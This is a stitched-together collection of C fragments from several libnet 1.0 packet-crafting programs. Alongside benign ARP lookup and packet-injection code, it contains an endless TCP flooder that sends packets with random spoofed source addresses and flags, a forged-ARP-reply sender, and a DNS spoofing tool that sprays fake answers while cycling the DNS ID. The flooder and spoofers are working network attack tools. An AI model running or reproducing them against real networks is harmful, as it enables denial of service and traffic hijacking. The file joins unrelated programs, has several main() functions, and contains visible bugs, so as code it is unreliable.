int sock;
// error buffer
char errbuff[LIBNET_ERRBUF_SIZE];
// src and dst mac
u_char dmac[6],smac[6];
// src and dst ip
unsigned int src_ip, dst_ip;
// packet buffer
unsigned char *packet;
// packet payload
char *payload;
// payload size
int p_size;
// bytes send over the wire
int send;
// check parameter
if(argc == 1)
{
printf("Usage: %s <arp/udp/tcp>\n",argv[0]);
exit(0);
}
else
{
strcpy(type,argv[1]);
}
// Allocate memory for the payload
payload = malloc(50);
// Packets payload
strcpy(payload,"TEST LIBNET\0");
packet = NULL;
// payload size
p_size = strlen(payload);
// mac address
strcpy(smac,SMAC);
strcpy(dmac,DMAC);
// ip address in network byte order
src_ip = inet_addr(SOURCE);
dst_ip = inet_addr(DEST);
// Lookup ip addresses
src_ip = libnet_name_resolve(libnet_host_lookup(src_ip,0),0);
dst_ip = libnet_name_resolve(libnet_host_lookup(dst_ip,0),0);
// Build an ARP packet?
if(!strcmp(type,"arp"))
{
// open the network device
link = libnet_open_link_interface(device,errbuff);
// Failed?
if(link == NULL)
{
printf("Error while opening device %s!\n%s\n",device,errbuff);
exit(1);
}
printf("Using device %s\n",device);
// Allocate memory for the packet
if(libnet_init_packet(LIBNET_ETH_H+LIBNET_ARP_H+p_size,&packet) == -1)
{
printf("libnet_init_packet error!\n%s\n", strerror(errno));
exit(1);
}
if(packet == NULL)
{
printf("libnet_init_packet error!\n");
exit(1);
}
// Build ethernet header
libnet_build_ethernet(dmac, // destination mac
smac, // source mac
ETHERTYPE_ARP,// ethernet packet type
NULL, // pointer to payload
0, // payload size
packet // pointer to packet buffer
);
printf("Sending ARP reply packet %s --> %s\n",SOURCE,DEST);
libnet_build_arp(ARPHRD_ETHER, // hardware type
ETHERTYPE_IP, // protocol type
ETHER_ADDR_LEN, // hardware address size
4, // protocol address size
ARPOP_REPLY, // ARP operation
smac, // source mac
(u_char *)&src_ip, // source ip
dmac, // destination mac
(u_char *)&dst_ip, // destination ip
NULL, // pointer to payload
0, // payload size
packet+LIBNET_ETH_H // pointer to packet buffer
);
// Get the packet on the wire
send = libnet_write_link_layer(link,device,packet,LIBNET_ETH_H+LIBNET_IP_H+LIBNET_TCP_H+p_size);
// was the complete packet send over the wire?
if(send < LIBNET_IP_H+LIBNET_TCP_H+p_size)
{
printf("error while writing packet into the socket...\n");
}
// close the network device
libnet_close_link_interface(link);
}
else
{
// Open a raw sock
sock = libnet_open_raw_sock(IPPROTO_RAW);
// Allocate memory for the packet
if(libnet_init_packet(LIBNET_IP_H+LIBNET_TCP_H+p_size,&packet) == -1)
{
printf("libnet_init_packet error!\n%s\n", strerror(errno));
exit(1);
}
// Build ip header
libnet_build_ip(LIBNET_TCP_H+p_size,// packet length without ip header length
0, // ip type of service
242, // ip id
0, // fragmentation bit
48, // time to live
IPPROTO_TCP, // Transport Control Protokoll
src_ip, // source ip
dst_ip, // destination ip
NULL, // pointer to ip payload
0, // ip options
packet // pointer to packet buffer
);
// Build UDP packet?
if(!strcmp(type,"udp"))
{
libnet_build_udp(ntohs(SPORT), // Source port
ntohs(DPORT), // destination port
payload, // pointer to packet payload
p_size, // payload size
packet+LIBNET_IP_H // pointer to packet buffer
);
printf("Sending UDP packet %s:%d --> %s.%d\n",SOURCE,SPORT,DEST,DPORT);
}
// Build TCP/IP packet per default
else
{
// Build tcp header
libnet_build_tcp(ntohs(SPORT), // source port
ntohs(DPORT), // destination port
1000000000, // acknowledge number
1000000000, // sequence number
TH_ACK, // tcp flags
1024, // window size
0, // urgent pointer
payload, // pointer to packet payload
p_size, // payload size
packet+LIBNET_IP_H // pointer to the packet buffer
);
printf("Sending TCP packet %s:%d --> %s.%d\n",SOURCE,SPORT,DEST,DPORT);
}
// Calculize checksum
libnet_do_checksum(packet,IPPROTO_TCP,LIBNET_IP_H+LIBNET_TCP_H+p_size);
// Get the packet on the wire
send = libnet_write_ip(sock,packet,LIBNET_IP_H+LIBNET_TCP_H+p_size);
// was the complete packet send over the wire?
if(send < LIBNET_IP_H+LIBNET_TCP_H+p_size)
{
printf("error while writing packet into the socket...\n");
}
// close the socket
libnet_close_raw_sock(sock);
}
// free the memory
//libnet_destroy_packet(packet);
free(payload);
free(errbuff);
return 1;
}
void send_packet(char *protocol, int sport2, int dport2, int id, int ttl, int count, const u_char *payload, int payload_size) {
char errbuf[LIBNET_ERRBUF_SIZE]; /* error buffer */
struct libnet_link_int *network; /* pointer to link interface struct */
int packet_size; /* size of our packet */
int ip_size; /* size of our ip */
int udp_size; /* size of our udp */
int tcp_size; /* size of our tcp */
int c;
u_char *packet; /* pointer to our packet buffer */
/*
* Step 1: Network Initialization (interchangable with step 2).
*/
if ((network = libnet_open_link_interface(dev2, errbuf)) == NULL) {
libnet_error(LIBNET_ERR_FATAL, "libnet_open_link_interface: %s\n", errbuf);
}
/*
* We're going to build a UDP packet with a payload using the
* link-layer API, so this time we need memory for a ethernet header
* as well as memory for the ICMP and IP headers and our payload.
*/
if (protocol == "udp") {
packet_size = LIBNET_ETH_H + LIBNET_IP_H + LIBNET_UDP_H + payload_size;
ip_size = LIBNET_IP_H + LIBNET_UDP_H + payload_size;
udp_size = LIBNET_UDP_H + payload_size;
/*
* Step 2: Memory Initialization (interchangable with step 1).
*/
if (libnet_init_packet(packet_size, &packet) == -1) {
libnet_error(LIBNET_ERR_FATAL, "libnet_init_packet failed\n");
}
/*
* Step 3: Packet construction (ethernet header).
*/
libnet_build_ethernet(
enet_dst,
enet_src,
ETHERTYPE_IP,
NULL,
0,
packet);
printf("\n--- Injected packet number %i on %s ---\n", count, dev2);
/*
* Step 3: Packet construction (IP header).
*/
libnet_build_ip(
LIBNET_UDP_H + payload_size,
0, /* IP tos */
id, /* IP ID */
0, /* Frag */
ttl, /* TTL */
IPPROTO_UDP, /* Transport protocol */
inet_addr(saddr2), /* Source IP */
inet_addr(daddr2), /* Destination IP */
payload, /* Pointer to payload (none) */
0,
packet + LIBNET_ETH_H); /* Packet header memory */
/*
* Step 3: Packet construction (UDP header).
*/
libnet_build_udp(
sport2, /* source port */
dport2, /* dest. port */
payload, /* payload */
payload_size, /* payload length */
packet + LIBNET_ETH_H + LIBNET_IP_H);
/*
* Step 4: Packet checksums (ICMP header *AND* IP header).
*/
if (libnet_do_checksum(packet + ETH_H, IPPROTO_UDP, LIBNET_UDP_H + payload_size) == -1) {
libnet_error(LIBNET_ERR_FATAL, "libnet_do_checksum failed\n");
}
if (libnet_do_checksum(packet + ETH_H, IPPROTO_IP, LIBNET_IP_H) == -1) {
libnet_error(LIBNET_ERR_FATAL, "libnet_do_checksum failed\n");
}
/* print packet info */
if (!hide_header) {
printf("IP header Src Addr: %s", saddr2);
printf(" Dst Addr: %s\n", daddr2);
printf(" Len: %i ID: %i TTL: %i\n", ip_size, id, ttl);
printf("UDP header Src port: %i Dst port: %i Len: %i\n", sport2, dport2, udp_size);
}
if (!hide_payload) {
printf("Payload (%d bytes)\n", payload_size);
print_payload(payload, payload_size);
}
}
if (protocol == "tcp") {
packet_size = LIBNET_ETH_H + LIBNET_IP_H + LIBNET_TCP_H + payload_size;
ip_size = LIBNET_IP_H + LIBNET_TCP_H + payload_size;
tcp_size = LIBNET_TCP_H + payload_size;
/*
* Step 2: Memory Initialization (interchangable with step 1).
*/
if (libnet_init_packet(packet_size, &packet) == -1) {
libnet_error(LIBNET_ERR_FATAL, "libnet_init_packet failed\n");
}
/*
* Step 3: Packet construction (ethernet header).
*/
libnet_build_ethernet(
enet_dst,
enet_src,
ETHERTYPE_IP,
NULL,
0,
packet);
printf("\n--- Injected packet number %i on %s ---\n", count, dev2);
/*
* Step 3: Packet construction (IP header).
*/
libnet_build_ip(
LIBNET_TCP_H + payload_size,
0, /* IP tos */
id, /* IP ID */
0, /* Frag */
ttl, /* TTL */
IPPROTO_TCP, /* Transport protocol */
inet_addr(saddr2), /* Source IP */
inet_addr(daddr2), /* Destination IP */
payload, /* Pointer to payload */
0,
packet + LIBNET_ETH_H); /* Packet header memory */
/*
* Step 3: Packet construction (TCP header).
*/
libnet_build_tcp(
sport2, /* source TCP port */
dport2, /* destination TCP port */
0xa1d95, /* sequence number */
0x53, /* acknowledgement number */
TH_SYN, /* control flags */
1024, /* window size */
0, /* urgent pointer */
NULL, /* payload (none) */
0, /* payload length */
packet + LIBNET_ETH_H + LIBNET_IP_H);
/*
* Step 4: Packet checksums (ICMP header *AND* IP header).
*/
if (libnet_do_checksum(packet + ETH_H, IPPROTO_TCP, LIBNET_TCP_H + payload_size) == -1) {
libnet_error(LIBNET_ERR_FATAL, "libnet_do_checksum failed\n");
}
if (libnet_do_checksum(packet + ETH_H, IPPROTO_IP, LIBNET_IP_H) == -1) {
libnet_error(LIBNET_ERR_FATAL, "libnet_do_checksum failed\n");
}
/* print packet info */
if (!hide_header) {
printf("IP header Src Addr: %s", saddr2);
printf(" Dst Addr: %s\n", daddr2);
printf(" Len: %i ID: %i TTL: %i\n", ip_size, id, ttl);
printf("TCP header Src port: %i Dst port: %i Len: %i\n", sport2, dport2, tcp_size);
}
if (!hide_payload) {
printf("Payload (%d bytes)\n", payload_size);
print_payload(payload, payload_size);
}
}
/*
* Step 5: Packet injection.
*/
c = libnet_write_link_layer(network, dev2, packet, packet_size);
if (c < packet_size) {
libnet_error(LN_ERR_WARNING, "libnet_write_link_layer only wrote %d bytes\n", c);
}
/*
* Shut down the interface.
*/
if (libnet_close_link_interface(network) == -1) {
libnet_error(LN_ERR_WARNING, "libnet_close_link_interface couldn't close the interface");
}
/*
* Free packet memory.
*/
libnet_destroy_packet(&packet);
printf("\n");
}
int
libnet_do_arp(struct libnet_link_int *l, u_char *device, struct ether_addr *e,
u_long ip)
{
int n, i;
u_char *buf, errbuf[256], *packet, *ip_p;
struct libnet_ethernet_hdr *p;
struct libnet_arp_hdr *a;
u_long local_ip;
pcap_t *pd;
struct pcap_pkthdr pc_hdr;
/*
* Initialize a packet.
*/
if (libnet_init_packet(LIBNET_ARP_H + LIBNET_ETH_H, &buf) == -1)
{
perror("libnet_init_packet memory:");
exit(EXIT_FAILURE);
}
/*
* Get the ethernet address of the device.
*/
e = libnet_get_hwaddr(l, device, errbuf);
if (e == NULL)
{
fprintf(stderr, "libnet_get_hwaddr: %s\n", errbuf);
return (-1);
}
/*
* Get the IP address of the device.
*/
local_ip = htonl(libnet_get_ipaddr(l, device, errbuf));
if (!local_ip)
{
fprintf(stderr, "libnet_get_ipaddr: %s\n", errbuf);
return (-1);
}
/*
* Open the pcap device.
*/
pd = pcap_open_live(device, LIBNET_ARP_H + LIBNET_ETH_H, 1, 500, errbuf);
if (pd == NULL)
{
fprintf(stderr, "pcap_open_live: %s\n", errbuf);
return (-1);
}
/*
* Ethernet header
*/
libnet_build_ethernet(
enet_dst, /* broadcast ethernet address */
e->ether_addr_octet, /* source ethernet address */
ETHERTYPE_ARP, /* this frame holds an ARP packet */
NULL, /* payload */
0, /* payload size */
buf); /* packet header memory */
/*
* ARP header
*/
libnet_build_arp(
ARPHRD_ETHER, /* hardware address type */
ETHERTYPE_IP, /* protocol address type */
ETHER_ADDR_LEN, /* hardware address length */
4, /* protocol address length */
ARPOP_REQUEST, /* packet type - ARP request */
e->ether_addr_octet, /* source (local) ethernet address */
(u_char *)&local_ip, /* source (local) IP address */
enet_dst, /* target's ethernet address (broadcast) */
(u_char *)&ip, /* target's IP address */
NULL, /* payload */
0, /* payload size */
buf + LIBNET_ETH_H); /* packet header memory */
n = libnet_write_link_layer(l, device, buf, LIBNET_ARP_H + LIBNET_ETH_H);
if (n == -1)
{
fprintf(stderr, "libnet_write_link_layer choked\n");
return (-1);
}
printf("Sent a %d byte ARP request looking for the MAC of %s.\n",
n, libnet_host_lookup(ip, 0));
printf("Waiting for a response...\n");
for (;(packet = ((u_char *)pcap_next(pd, &pc_hdr)));)
{
p = (struct libnet_ethernet_hdr *)(packet);
if (ntohs(p->ether_type) == ETHERTYPE_ARP)
{
a = (struct libnet_arp_hdr *)(packet + LIBNET_ETH_H);
if (ntohs(a->ar_op) == ARPOP_REPLY)
{
ip_p = (u_char *)&ip;
if (IP_UCHAR_COMP(a->ar_spa, ip_p))
{
printf("Target hardware address: ");
for (i = 0; i < 6; i++)
{
printf("%x", a->ar_sha[i]);
if (i != 5)
{
printf(":");
}
}
printf("\n");
}
}
}
}
libnet_destroy_packet(&buf);
return (n);
}
int buildether(ETHERhdr *eth, FileData *pd, char *device)
{
int n;
u_int32_t eth_packetlen;
static u_int8_t *pkt;
char *ethertype;
struct libnet_link_int *l2 = NULL;
/* sanity checks */
if (pd->file_mem == NULL)
pd->file_s = 0;
eth_packetlen = LIBNET_ETH_H + pd->file_s;
if ((l2 = libnet_open_link_interface(device, errbuf)) == NULL)
{
nemesis_device_failure(INJECTION_LINK, (const char *)device);
return -1;
}
if (libnet_init_packet(eth_packetlen, &pkt) == -1)
{
fprintf(stderr, "ERROR: Unable to allocate packet memory.\n");
exit(1);
}
libnet_build_ethernet(eth->ether_dhost, eth->ether_shost, eth->ether_type,
pd->file_mem, pd->file_s, pkt);
n = libnet_write_link_layer(l2, device, pkt, eth_packetlen);
#ifdef DEBUG
printf("DEBUG: eth_packetlen is %u.\n", eth_packetlen);
#endif
if (verbose == 2)
nemesis_hexdump(pkt, eth_packetlen, HEX_ASCII_DECODE);
if (verbose == 3)
nemesis_hexdump(pkt, eth_packetlen, HEX_RAW_DECODE);
switch(eth->ether_type)
{
case ETHERTYPE_PUP:
ethertype = "PUP";
break;
case ETHERTYPE_IP:
ethertype = "IP";
break;
case ETHERTYPE_ARP:
ethertype = "ARP";
break;
case ETHERTYPE_REVARP:
ethertype = "REVARP";
break;
case ETHERTYPE_8021Q:
ethertype = "802.1q";
break;
case ETHERTYPE_IPV6:
ethertype = "IPV6";
break;
case ETHERTYPE_PPPOEDISC:
ethertype = "PPOEDISC";
break;
case ETHERTYPE_PPPOE:
ethertype = "PPOE";
break;
default:
ethertype = NULL;
break;
}
if (verbose)
{
if (ethertype != NULL)
printf("Wrote %d byte Ethernet type %s packet through linktype "
"%s.\n", n, ethertype,
nemesis_lookup_linktype(l2->linktype));
else
printf("Wrote %d byte Ethernet type %hu packet through linktype "
"%s.\n", n, eth->ether_type,
nemesis_lookup_linktype(l2->linktype));
}
libnet_destroy_packet(&pkt);
if (l2 != NULL)
libnet_close_link_interface(l2);
return (n);
}
int main(int argc, char *argv[]) {
int r;
int i;
int c;
char ebuf[LIBNET_ERRBUF_SIZE];
struct ether_addr broadcast_ea;
struct ether_addr *sea;
struct ether_addr tea;
struct in_addr sip, tip;
uint8_t *arp_probe_packet;
int sock_fd;
struct ifreq ifr;
char *if_name = "eth0";
struct libnet_link_int *lin;
uint32_t tmp[6];
broadcast_ea.ether_addr_octet[0] = 0xFF;
broadcast_ea.ether_addr_octet[1] = 0xFF;
broadcast_ea.ether_addr_octet[2] = 0xFF;
broadcast_ea.ether_addr_octet[3] = 0xFF;
broadcast_ea.ether_addr_octet[4] = 0xFF;
broadcast_ea.ether_addr_octet[5] = 0xFF;
while ((c = getopt(argc, argv, "hi:")) != EOF) {
switch (c) {
case 'h':
usage(0);
case 'i':
if_name = optarg;
break;
default:
print("unknown argument: %s\n", optarg);
usage(1);
}
}
// initialize libnet link-level access to the network interface
lin = libnet_open_link_interface(if_name, ebuf);
if (!lin) die("libnet_open_link_interface(\"%s\"): %s\n", if_name, ebuf);
// get the Ethernet address of this interface
sea = libnet_get_hwaddr(lin, if_name, ebuf);
if (!sea) die("libnet_get_hwaddr(\"%s\"): %s\n", if_name, ebuf);
// get the IP address of this interface
sock_fd = socket(PF_INET, SOCK_DGRAM, IPPROTO_IP);
if (sock_fd < 0) die("cannot create socket: %s\n", strerror(errno));
strncpy(ifr.ifr_name, if_name, IFNAMSIZ - 1);
ifr.ifr_name[IFNAMSIZ - 1] = (char)NULL;
ifr.ifr_addr.sa_family = AF_INET;
r = ioctl(sock_fd, SIOCGIFADDR, &ifr);
if (r < 0) die("SIOCSIFADDR error: %s\n", strerror(errno));
sip = ((struct sockaddr_in *)&ifr.ifr_addr)->sin_addr;
close(sock_fd);
for (i = optind; i < argc; i ++) {
if (strncmp(argv[i], "sip=", 4) == 0) {
r = inet_aton(&argv[i][4], &sip);
if (r == 0) die("invalid sip\n");
} else if (strncmp(argv[i], "sea=", 4) == 0) {
r = sscanf(
argv[i],
"sea=%X:%X:%X:%X:%X:%X",
&tmp[0],
&tmp[1],
&tmp[2],
&tmp[3],
&tmp[4],
&tmp[5]
);
sea->ether_addr_octet[0] = tmp[0];
sea->ether_addr_octet[1] = tmp[1];
sea->ether_addr_octet[2] = tmp[2];
sea->ether_addr_octet[3] = tmp[3];
sea->ether_addr_octet[4] = tmp[4];
sea->ether_addr_octet[5] = tmp[5];
if (r != 6) die("invalid sea\n");
} else if (strncmp(argv[i], "tip=", 4) == 0) {
r = inet_aton(&argv[i][4], &tip);
if (r == 0) die("invalid tip\n");
} else if (strncmp(argv[i], "tea=", 4) == 0) {
r = sscanf(
argv[i],
"tea=%X:%X:%X:%X:%X:%X",
&tmp[0],
&tmp[1],
&tmp[2],
&tmp[3],
&tmp[4],
&tmp[5]
);
tea.ether_addr_octet[0] = tmp[0];
tea.ether_addr_octet[1] = tmp[1];
tea.ether_addr_octet[2] = tmp[2];
tea.ether_addr_octet[3] = tmp[3];
tea.ether_addr_octet[4] = tmp[4];
tea.ether_addr_octet[5] = tmp[5];
if (r != 6) die("invalid tea\n");
} else {
die("unknown arg: %s\n", argv[i]);
}
}
print("interface %s\n", if_name);
print(" sip: %s\n", inet_ntoa(sip));
print(" sea: %02X:%02X:%02X:%02X:%02X:%02X\n",
sea->ether_addr_octet[0],
sea->ether_addr_octet[1],
sea->ether_addr_octet[2],
sea->ether_addr_octet[3],
sea->ether_addr_octet[4],
sea->ether_addr_octet[5]
);
print(" tip: %s\n", inet_ntoa(tip));
print(" tea: %02X:%02X:%02X:%02X:%02X:%02X\n",
tea.ether_addr_octet[0],
tea.ether_addr_octet[1],
tea.ether_addr_octet[2],
tea.ether_addr_octet[3],
tea.ether_addr_octet[4],
tea.ether_addr_octet[5]
);
// allocate memory for the ARP probe packet
r = libnet_init_packet(LIBNET_ETH_H + LIBNET_ARP_H, &arp_probe_packet);
if (r == -1) die("libnet_init_packet(): error\n");
// build the Ethernet header of the ARP probe packet
r = libnet_build_ethernet(
broadcast_ea.ether_addr_octet,
sea->ether_addr_octet,
ETHERTYPE_ARP,
NULL, 0, // payload pointer and size
arp_probe_packet
);
if (r == -1) die("libnet_build_ethernet(): error\n");
// build the ARP header
r = libnet_build_arp(
ARPHRD_ETHER,
ETHERTYPE_IP,
ETH_ALEN,
4,
ARPOP_REQUEST,
sea->ether_addr_octet, (uint8_t *)&sip.s_addr,
tea.ether_addr_octet, (uint8_t *)&tip.s_addr,
NULL, 0, // payload pointer and size
arp_probe_packet + LIBNET_ETH_H
);
if (r == -1) die("libnet_build_arp(): error\n");
r = libnet_write_link_layer(
lin,
if_name,
arp_probe_packet,
LIBNET_ARP_H + LIBNET_ETH_H
);
if (r == -1) die("libnet_write_link_layer(): error\n");
return 0;
}
int
main (int argc, char *argv[])
{
int i, loop;
/* no payload yet */
int size = LIBNET_PACKET;
opt.seqn = opt.ackn = opt.flags = 0;
opt.dport = opt.sport = opt.frag = 0;
opt.ttl = 255;
opt.winsize = 16384;
opt.tos = 0x08;
signal (SIGINT, (void (*)()) abort);
srand (time (NULL) + getpid ());
srandom (time (NULL) + getpid ());
banner ();
parse_args (argc, argv);
if (!whocares)
{
if (!local)
{
if (!(opt.dst = libnet_name_resolve (dsthost, LIBNET_RESOLVE)))
{
libnet_error (LIBNET_ERR_FATAL,
":: invalid destination IP address: %s\n", dsthost);
exit (1);
}
printf (":: destination host - %s\n", dsthost);
}
else
printf (":: destination host - local\n");
}
else
printf (":: destination host - whocares\n");
printf (":: destination port(s)");
for (i = 1; i < ports + 1; i++)
printf (" - %d", portarray[i]);
printf ("\n");
if (libnet_init_packet (size, &packet) == NULL)
{
libnet_error (LIBNET_ERR_FATAL,
":: libnet_init_packet failed\n");
}
if ((s = libnet_open_raw_sock (IPPROTO_RAW)) == -1)
{
libnet_error (LIBNET_ERR_FATAL, ":: cannot open socket.\n");
}
printf (":: spanking...\n");
printf (":: press ^C to end...\n");
for (;;)
{
for (i = 1; i < ports + 1; i++)
{
if (whocares)
change2 = random () & 01;
if (ismult)
{
opt.src = ((224 + rand () % 239) << 24) + ((rand () % 254) << 16) + ((rand () % 254) << 8) + (rand () % 254);
if (local)
opt.dst = ((224 + rand () % 239) << 24) + (0 << 16) + (0 << 8) + (rand () % 5);
else
{
if (change2)
opt.dst = ((224 + rand () % 239) << 24) + ((rand () % 254) << 16) + ((rand () % 254) << 8) + (rand () % 254);
else
opt.dst = rand ();
}
}
else
{
opt.src = rand ();
if (local)
opt.dst = ((224 + rand () % 239) << 24) + (0 << 16) + (0 << 8) + (rand () % 5);
else
{
if (change2)
opt.dst = ((224 + rand () % 239) << 24) + ((rand () % 254) << 16) + ((rand () % 254) << 8) + (rand () % 254);
else
opt.dst = rand ();
}
}
if (isrand)
{
loop = rand () % 5;
for (i = 0; i <= loop; i++)
opt.flags |= flag_array[rand () % 5];
opt.frag = frag_array[rand () % 3];
opt.ackn = random ();
opt.sport = 1024 + rand () % 32000;
opt.tos = tos_array[rand () % 3];
opt.ttl = rand () % 255;
opt.winsize = rand () % 32000;
if (change)
ismult = random () & 01;
}
opt.ident = random ();
opt.seqn = random ();
if (!stream)
opt.ackn = random ();
if (portarray[i] == 0)
opt.dport = rand () % 1024;
else
opt.dport = portarray[i];
libnet_build_ip (TCP_H, opt.tos, opt.ident, opt.frag, opt.ttl, IPPROTO_TCP, opt.src, opt.dst, NULL, 0, packet);
libnet_build_tcp (opt.sport, opt.dport, opt.seqn, opt.ackn, opt.flags, opt.winsize, 0, NULL, 0, packet + IP_H);
if (libnet_do_checksum (packet, IPPROTO_TCP, TCP_H) == -1)
{
libnet_error (LIBNET_ERR_FATAL, ":: libnet_do_checksum failed\n");
}
libnet_write_ip (s, packet, size);
}
}
return 1;
}
int main (int argc, char **argv) {
u_long src_ip, /* source address */
dst_ip; /* destination address */
u_short src_port, /* source port */
dst_port, /* destination port */
id; /* dns id we are spoofing */
int i, /* loop counter */
written_bytes, /* number of bytes written */
packet_size, /* size of our packet */
payload_size, /* size of our payload */
npackets, /* num of packet to write */
socket; /* socket to write on */
u_char *packet, /* we build this */
*payload; /* we send this */
if (argc < 7) {
printf("\nusage: answer_dns <source_ip> <port> <destination_ip> <port> <dns_id> <#_packets>\n");
exit (EXIT_FAILURE);
}
if ((socket = libnet_open_raw_sock(IPPROTO_RAW)) == -1)
libnet_error(LIBNET_ERR_FATAL, "network initialization failed\n");
src_ip = libnet_name_resolve(argv[1], 0);
dst_ip = libnet_name_resolve(argv[3], 0);
src_port = (u_short) atoi(argv[2]);
dst_port = (u_short) atoi(argv[4]);
id = (u_short) atoi(argv[5]);
npackets = (int) atoi(argv[6]);
payload = /* question section name/types, size: 21 */
"\x03\x77\x77\x77\x07\x72\x65\x64\x68\x69\x76\x65\x03\x63\x6f\x6d\x00\x00\x01\x00\x01"
/* answer section, names/types, size: 21 */
"\x03\x77\x77\x77\x07\x72\x65\x64\x68\x69\x76\x65\x03\x63\x6f\x6d\x00\x00\x01\x00\x01"
/* answer section, ttl, size: 4 */
"\xff\xff\xff\xff"
/* answer section, rdata length, size: 2 */
"\x00\x04"
/* answer section, rdata, size: 4 */
"\x81\x51\xe0\x43";
payload_size = 52;
/*
* packet memory allocation
*/
packet_size = payload_size + LIBNET_IP_H + LIBNET_UDP_H + LIBNET_DNS_H;
libnet_init_packet(packet_size, &packet);
if (packet == NULL)
libnet_error(LIBNET_ERR_FATAL, "libnet_init_packet failed\n");
/*
* ip header construction
*/
libnet_build_ip(payload_size + LIBNET_UDP_H + LIBNET_DNS_H,
0, /* ip tos */
10951, /* ip id */
0, /* fragmentation bits */
64, /* ttl */
IPPROTO_UDP, /* protocol */
src_ip, /* source address */
dst_ip, /* destination address */
NULL, /* payload */
0, /* payload length */
packet); /* packet buffer */
/*
* udp header construction
* during debugging i found that we weren't generating the correct
* length here, that is why a payload length is included (payload + dns_header)
* it really shouldn't be here though
*/
libnet_build_udp(src_port, /* source port */
dst_port, /* destination port */
NULL, /* payload */
payload_size + 12, /* payload length */
packet + LIBNET_IP_H);
/*
* write npackets
* we loop from here because we must change the dns id and also re-checksum
*/
printf("\nwriting packets");
for (i = 0; i < npackets; i++) {
printf(".");
/*
* dns header construction
*/
libnet_build_dns(id+i, /* dns id */
0x8180, /* control flags */
1, /* number of questions */
1, /* number of answer RR's */
0, /* number of authority RR's */
0, /* number of additional RR's */
payload, /* payload */
payload_size, /* payload length */
packet + LIBNET_IP_H + LIBNET_UDP_H);
/*
* calculate checksum
*/
libnet_do_checksum (packet, IPPROTO_UDP, packet_size - LIBNET_IP_H);
/*
* write packet
*/
written_bytes = libnet_write_ip(socket, packet, packet_size);
/*
* make sure the number of written bytes jives with what we expect
*/
if (written_bytes < packet_size)
libnet_error(LN_ERR_WARNING, "libnet_write_ip only wrote %d of %d bytes\n", written_bytes, packet_size);
}
/*
* cleanup
*/
libnet_destroy_packet(&packet);
if (libnet_close_raw_sock(socket) == -1)
libnet_error(LN_ERR_WARNING, "libnet_close_raw_sock couldn't close the interface");
printf("\n");
return (written_bytes == -1 ? EXIT_FAILURE : EXIT_SUCCESS);
}
